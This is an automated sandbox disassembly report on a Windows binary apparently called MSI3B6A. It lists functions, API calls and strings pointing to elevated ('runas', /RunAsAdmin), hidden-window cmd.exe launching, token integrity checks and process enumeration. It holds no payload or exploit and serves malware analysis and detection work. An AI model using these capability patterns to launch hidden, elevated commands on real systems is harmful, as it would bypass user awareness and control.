/C ""%s" %s", xrefs: 006F54C1
%s\System32\cmd.exe, xrefs: 006F54A9
Visible, xrefs: 006F55DB, 006F55EA
Verb:<, xrefs: 006F559E
Parameters:<, xrefs: 006F55C6
<St, xrefs: 006F5561
ShellExecuteInfo members:, xrefs: 006F5540
open, xrefs: 006F54D5
.bat, xrefs: 006F5422
FilePath:<, xrefs: 006F5589
.cmd, xrefs: 006F545F
Kernel32.dll, xrefs: 006F5677, 006F56A6
GetProcessId, xrefs: 006F5672, 006F56A1
Directory:<, xrefs: 006F55B2
Window Visibility:, xrefs: 006F55E3
Hidden, xrefs: 006F55D6
runas, xrefs: 006F54EC

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ProcessWindow$AddressExecuteForegroundHandleModuleProcShellWindows$AllowBringCodeDirectoryEnumExitObjectSingleSleepWait
String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$<St$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Verb:<$Visible$Window Visibility:$open$runas
API String ID: 2597324065-3430802768
Opcode ID: 578702477a562d9405dabadd791b154d550ad7a3f4dc169dad8f0340286a8a6d
Instruction ID: 4c61191cf9ab0dabdf0bc60fdf177f3dd83abe24623e420c2f352ac751ae032b
Opcode Fuzzy Hash: 578702477a562d9405dabadd791b154d550ad7a3f4dc169dad8f0340286a8a6d
Instruction Fuzzy Hash: 14E1B171A00A0D9BDB14DFA8C845BFEB7F6AF44710F548129EA16EB391E7349D41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 006F6A50 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 461
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 006F6AC8
OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 006F6AD5
CloseHandle.KERNEL32(00000000), ref: 006F6AF5

Strings

S-1-5-18, xrefs: 006F6B69

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Process$CloseCurrentHandleOpenToken
String ID: S-1-5-18
API String ID: 4052875653-4289277601
Opcode ID: adf97158e2e1c969a5b02066a5623ad7af1ebfcc1080adb8ef3f1636013d4677
Instruction ID: 078dbe5bc1e035ee2817b42a653798f2288b9bb8965ae9a2e75a1dc34333c683
Opcode Fuzzy Hash: adf97158e2e1c969a5b02066a5623ad7af1ebfcc1080adb8ef3f1636013d4677
Instruction Fuzzy Hash: 4302AD7190124D8BDF14DFA8C9557FEBBB6EF05314F14825CEA42AB285EB34AE05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 006F57C0 Relevance: 6.0, APIs: 4, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000008,?,DBD9785B,?,-00000010), ref: 006F57D0
OpenProcessToken.ADVAPI32(00000000), ref: 006F57D7
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 006F580C
CloseHandle.KERNEL32(?), ref: 006F5822

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpen
String ID:
API String ID: 215268677-0
Opcode ID: c234c5a7cb8ca9e6310f5b2b4c0d591f321716177b01ec9a26cd4adcc48054e1
Instruction ID: e16d14f975485d71c4fd6a448144f55644eb59817d3c03c7a3260e4060c71704
Opcode Fuzzy Hash: c234c5a7cb8ca9e6310f5b2b4c0d591f321716177b01ec9a26cd4adcc48054e1
Instruction Fuzzy Hash: 68F036B4148305AFE7149F10ED45BAA7BE8FB44701F508819FE95C2260D379951CDB67

Uniqueness

Uniqueness Score: -1.00%

Function 006FCDB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineW.KERNEL32(DBD9785B,?,?,?,?,?,?,?,?,?,007356D5,000000FF), ref: 006FCDE8

Part of subcall function 006F1F80: LocalAlloc.KERNEL32(00000040,00000000,?,?,vector too long,006F4251,DBD9785B,00000000,?,00000000,?,?,?,00734400,000000FF,?), ref: 006F1F9D

ExitProcess.KERNEL32 ref: 006FCEB1

Part of subcall function 006F6600: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 006F667E

Strings

Full command line:, xrefs: 006FCE13

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: AllocCommandCreateExitFileLineLocalProcess
String ID: Full command line:
API String ID: 1878577176-831861440
Opcode ID: 74944ba2b0336af43ad84f4f0086d8a163ad9080d2d703d1cc9cbbfe401a1ed0
Instruction ID: e7fb5824ccf5c3deac04655393dfc2b6d2d27c9f2ad252ba61741fdd7ebc03d0
Opcode Fuzzy Hash: 74944ba2b0336af43ad84f4f0086d8a163ad9080d2d703d1cc9cbbfe401a1ed0
Instruction Fuzzy Hash: C021027191021CABCB55FB60CD46BFE73A6AF41750F14812CF502AB292EF385A08C799

Uniqueness

Uniqueness Score: -1.00%

Function 006F5E40 Relevance: 4.6, APIs: 3, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,006F5E18,DBD9785B,?), ref: 006F5EB4
GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,006F5E18,DBD9785B,?), ref: 006F5EBE
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,006F5E18,DBD9785B,?), ref: 006F5F1A

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: InformationToken$ErrorLast
String ID:
API String ID: 2567405617-0
Opcode ID: 57cb61920ec73a24017d20acc1d6d2e010332e159b675e2e8d451fae899a2fcf
Instruction ID: 1ffd29ed9c16dce3ee3dc4421fced4b9f3ab8ee8029182e3d6319e0774348776
Opcode Fuzzy Hash: 57cb61920ec73a24017d20acc1d6d2e010332e159b675e2e8d451fae899a2fcf
Instruction Fuzzy Hash: AF315EB1A006099FD724CF59CD45BBFBBFAFB44710F10456EE616A7280DBB569048B90

Uniqueness

Uniqueness Score: -1.00%

Function 007270BB Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,0072596A,00000001,00000364,?,00000006,000000FF,?,00716CE7,00000000,A8r,00000000), ref: 007270FC

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 212a1132d72e1b6118f9553603167f95223994e63734e14336dadae9af137170
Instruction ID: ec1d60ddb584c4b26970b5bbe9acd5addbefce3ed83667a46a7997a2282cfd1e
Opcode Fuzzy Hash: 212a1132d72e1b6118f9553603167f95223994e63734e14336dadae9af137170
Instruction Fuzzy Hash: A1F0E93120C234A6EB3E5A25BF06B5B775DEF91771B158011BC149A190CF3CEC10C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 006F5940 Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(?,DBD9785B,00000000,?,?,?), ref: 006F5982

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 5321bfb8b0c1b7975fca8dbc312e1c4152daf2a0dade493235d8fd8109247a51
Instruction ID: cc0938a9e633bbfead4eb362ae9d3b73939b4352dfecc5e1a234b29df48a0846
Opcode Fuzzy Hash: 5321bfb8b0c1b7975fca8dbc312e1c4152daf2a0dade493235d8fd8109247a51
Instruction Fuzzy Hash: D1F0C271A08A48EFD714CF59DD40B56FBF8EB05721F10426AE911C3790D3369800C690

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 006F4BA0 Relevance: 33.5, APIs: 22, Instructions: 502comCOMMON

Download Yara Rule

APIs

Part of subcall function 006F57C0: GetCurrentProcess.KERNEL32(00000008,?,DBD9785B,?,-00000010), ref: 006F57D0
Part of subcall function 006F57C0: OpenProcessToken.ADVAPI32(00000000), ref: 006F57D7

CoInitialize.OLE32(00000000), ref: 006F4C15
CoCreateInstance.OLE32(007372B0,00000000,00000004,00745104,00000000,?), ref: 006F4C45
CoUninitialize.OLE32 ref: 006F5187
_com_issue_error.COMSUPP ref: 006F51B5

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Process$CreateCurrentInitializeInstanceOpenTokenUninitialize_com_issue_error
String ID:
API String ID: 928366108-0
Opcode ID: b67ac990af580ae7022094cb4079fca87b59ad42d255e2977ce4ac555d3701e6
Instruction ID: 623a5b62a71857c1ea1605d45b027352e5072c55b67ec3f84452ff038697bf1a
Opcode Fuzzy Hash: b67ac990af580ae7022094cb4079fca87b59ad42d255e2977ce4ac555d3701e6
Instruction Fuzzy Hash: 7522AD70A0438CDFEB21CFA8C848BAEBBB5AF45304F148199E505EB391DB759E45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 006FC870 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 366registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 006FCBB6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,0074E6D0,00000800), ref: 006FCBD3

Strings

/LogFile, xrefs: 006FCA07
/RunAsAdmin , xrefs: 006FC92B, 006FC94C, 006FC951
/DIR , xrefs: 006FC9F3
/HideWindow, xrefs: 006FC98E, 006FC9AC, 006FC9B1
/DontWait , xrefs: 006FC8D8, 006FC8EE, 006FC8F3
/EnforcedRunAsAdmin , xrefs: 006FC893, 006FC8A3, 006FC8A8

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: OpenQueryValue
String ID: /DIR $/DontWait $/EnforcedRunAsAdmin $/HideWindow$/LogFile$/RunAsAdmin
API String ID: 4153817207-482544602
Opcode ID: 178bbcb7467f74cc71ecacf77cdabb6de20cc28a2b4504e145133df0126cb83b
Instruction ID: 2f43e27351dad5d45ad4e7a3721af7d90a950d45bf7a8708fe58b8d8ee73b71d
Opcode Fuzzy Hash: 178bbcb7467f74cc71ecacf77cdabb6de20cc28a2b4504e145133df0126cb83b
Instruction Fuzzy Hash: 6AC1493450421E8BCB349F14CA012FAB3A3FF90760F58845EEA899B395E770CD92C394

Uniqueness

Uniqueness Score: -1.00%

Function 0072DE24 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 007257CC: GetLastError.KERNEL32(?,00000008,0072AD4C,?,?,?,?,00000000,?,?), ref: 007257D0
Part of subcall function 007257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00725872

GetACP.KERNEL32(?,?,?,?,?,?,007242D9,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0072DEE5
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,007242D9,?,?,?,00000055,?,-00000050,?,?), ref: 0072DF10
_wcschr.LIBVCRUNTIME ref: 0072DFA4
_wcschr.LIBVCRUNTIME ref: 0072DFB2
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0072E073

Strings

utf8, xrefs: 0072DFE2

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: 422624cf22e0622c2c93f9af5e4bb63b21eb8a7060bab9d4a290f5160bd8ad41
Instruction ID: 0e2052c6f67e1e85ecddfa1a7fb1d27b73adf3b0873815d28bff6bdf96ac7f3d
Opcode Fuzzy Hash: 422624cf22e0622c2c93f9af5e4bb63b21eb8a7060bab9d4a290f5160bd8ad41
Instruction Fuzzy Hash: 6B71D572A00625EADB34AB74EC4ABAB73A8EF54700F154429F505DB181FBBCED41C761

Uniqueness

Uniqueness Score: -1.00%

Function 006F3860 Relevance: 10.7, APIs: 7, Instructions: 227processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006F38CB
CloseHandle.KERNEL32(00000000), ref: 006F390B
Process32FirstW.KERNEL32(?,00000000), ref: 006F395F
OpenProcess.KERNEL32(00000410,00000000,?), ref: 006F397A
CloseHandle.KERNEL32(00000000), ref: 006F3A8E
Process32NextW.KERNEL32(?,00000000), ref: 006F3AA2
CloseHandle.KERNEL32(?), ref: 006F3AF0

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 708755948-0
Opcode ID: 18ff56ef7247058fce542ca602a78d8b49cd8b5d75ca5ea0d576554beba49055
Instruction ID: 3d2a77ddd38937305e571900ed9b12c45298700169559a7d265e263b0e5e7900
Opcode Fuzzy Hash: 18ff56ef7247058fce542ca602a78d8b49cd8b5d75ca5ea0d576554beba49055
Instruction Fuzzy Hash: 06A10AB1901259DFDF14CFA9D988BEEBBF5BF48304F148159E905AB340D7785A44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0072F032 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0072F216

Strings

1#SNAN, xrefs: 0072F13E
1#QNAN, xrefs: 0072F145
1#INF, xrefs: 0072F168
1#IND, xrefs: 0072F137

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 17f0141be729b3eefa7b2a06bdd02e35db5892b96f99cde62774bf8a1c0e6a99
Instruction ID: 18bae99db6672c07f9747a98b28e593b85b58b97df300b34b89f3a7ce9f7be64
Opcode Fuzzy Hash: 17f0141be729b3eefa7b2a06bdd02e35db5892b96f99cde62774bf8a1c0e6a99
Instruction Fuzzy Hash: B0D22972E082298FDB65CE28DD547EAB7B5EB44304F1441FAD84DE7241E778AE818F81

Uniqueness

Uniqueness Score: -1.00%

Function 0072E5B3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,0072E8D1,00000002,00000000,?,?,?,0072E8D1,?,00000000), ref: 0072E64C
GetLocaleInfoW.KERNEL32(?,20001004,0072E8D1,00000002,00000000,?,?,?,0072E8D1,?,00000000), ref: 0072E675
GetACP.KERNEL32(?,?,0072E8D1,?,00000000), ref: 0072E68A

Strings

OCP, xrefs: 0072E607
ACP, xrefs: 0072E5D1

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 8f389521d1cf5eff27da9f5cba0ad93dffbca46d94a28e9ac4ff8e590adb4354
Instruction ID: 5e188a14d2e0ca016a7d9dbb40a17574103ba2ae8f4f3347101f9d8c153bfc7e
Opcode Fuzzy Hash: 8f389521d1cf5eff27da9f5cba0ad93dffbca46d94a28e9ac4ff8e590adb4354
Instruction Fuzzy Hash: 8621CF72B40224EAEB34CF25E905A9773A6EF74F64B568464E90AD7110F73ADE40C350

Uniqueness

Uniqueness Score: -1.00%

Function 006F9CC0 Relevance: 7.9, APIs: 5, Instructions: 441COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 006F9E60
LocalFree.KERNEL32(00000000), ref: 006F9EB7
_swprintf.LIBCMT ref: 006FA0A0
LocalFree.KERNEL32(00000000), ref: 006FA0F7
_swprintf.LIBCMT ref: 006FA183

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: _swprintf$FreeLocal
String ID:
API String ID: 2429749586-0
Opcode ID: 46e96467797d563c984b71c5a580d99128c16af0ef83b874de75c247f1b78dd0
Instruction ID: c2facea79f52cc156b3812b6246de8fb337f58d3b72311991bb9ecf182dc04b7
Opcode Fuzzy Hash: 46e96467797d563c984b71c5a580d99128c16af0ef83b874de75c247f1b78dd0
Instruction Fuzzy Hash: 60F18A71D1021DABDB19DFA8DC40BEEBBB6FF49304F144229FA05A7281D735A941CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0072E788 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 007257CC: GetLastError.KERNEL32(?,00000008,0072AD4C,?,?,?,?,00000000,?,?), ref: 007257D0
Part of subcall function 007257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00725872

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0072E894
IsValidCodePage.KERNEL32(00000000), ref: 0072E8DD
IsValidLocale.KERNEL32(?,00000001), ref: 0072E8EC
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0072E934
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0072E953

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 3c93fa3ff53417b2c8cb7b95f20fdaba8999bed486785e58d49b22a26dae2c4f
Instruction ID: 66bf526b8c4cf967b3580ea82f70dd20212e620dd3ae57a6eb312dd49014c3e4
Opcode Fuzzy Hash: 3c93fa3ff53417b2c8cb7b95f20fdaba8999bed486785e58d49b22a26dae2c4f
Instruction Fuzzy Hash: A4517271A00229EFEF20DFA5EC45ABE77B8FF48701F145469E940E7291E7789940CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 006F2310 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00712C98: EnterCriticalSection.KERNEL32(0074DD3C,?,?,?,006F23B6,0074E638,DBD9785B,?,?,00733D6D,000000FF), ref: 00712CA3
Part of subcall function 00712C98: LeaveCriticalSection.KERNEL32(0074DD3C,?,?,?,006F23B6,0074E638,DBD9785B,?,?,00733D6D,000000FF), ref: 00712CE0

GetProcessHeap.KERNEL32 ref: 006F2365

Part of subcall function 00712C4E: EnterCriticalSection.KERNEL32(0074DD3C,?,?,006F2427,0074E638,00736B40), ref: 00712C58
Part of subcall function 00712C4E: LeaveCriticalSection.KERNEL32(0074DD3C,?,?,006F2427,0074E638,00736B40), ref: 00712C8B
Part of subcall function 00712C4E: RtlWakeAllConditionVariable.NTDLL ref: 00712D02

Strings

\Lt, xrefs: 006F2370
<t, xrefs: 006F2407
pLt, xrefs: 006F23D0, 006F242A
Xt, xrefs: 006F23DA

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
String ID: <t$Xt$\Lt$pLt
API String ID: 325507722-3881503141
Opcode ID: 90155c62e4f4d2ce73928c002d4a69ececd13303bd2912ee6dab0f97fc0296fc
Instruction ID: ff35ba846aed7e09a3d78f7fe9e872617e281bf588aec3069d89b84dde83e3ed
Opcode Fuzzy Hash: 90155c62e4f4d2ce73928c002d4a69ececd13303bd2912ee6dab0f97fc0296fc
Instruction Fuzzy Hash: 962168F4901245DBE310CF58ED4978977B0F726730F12826AE929972E1D77C18048F6B

Uniqueness

Uniqueness Score: -1.00%

Function 00725D6D Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00725DFA

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
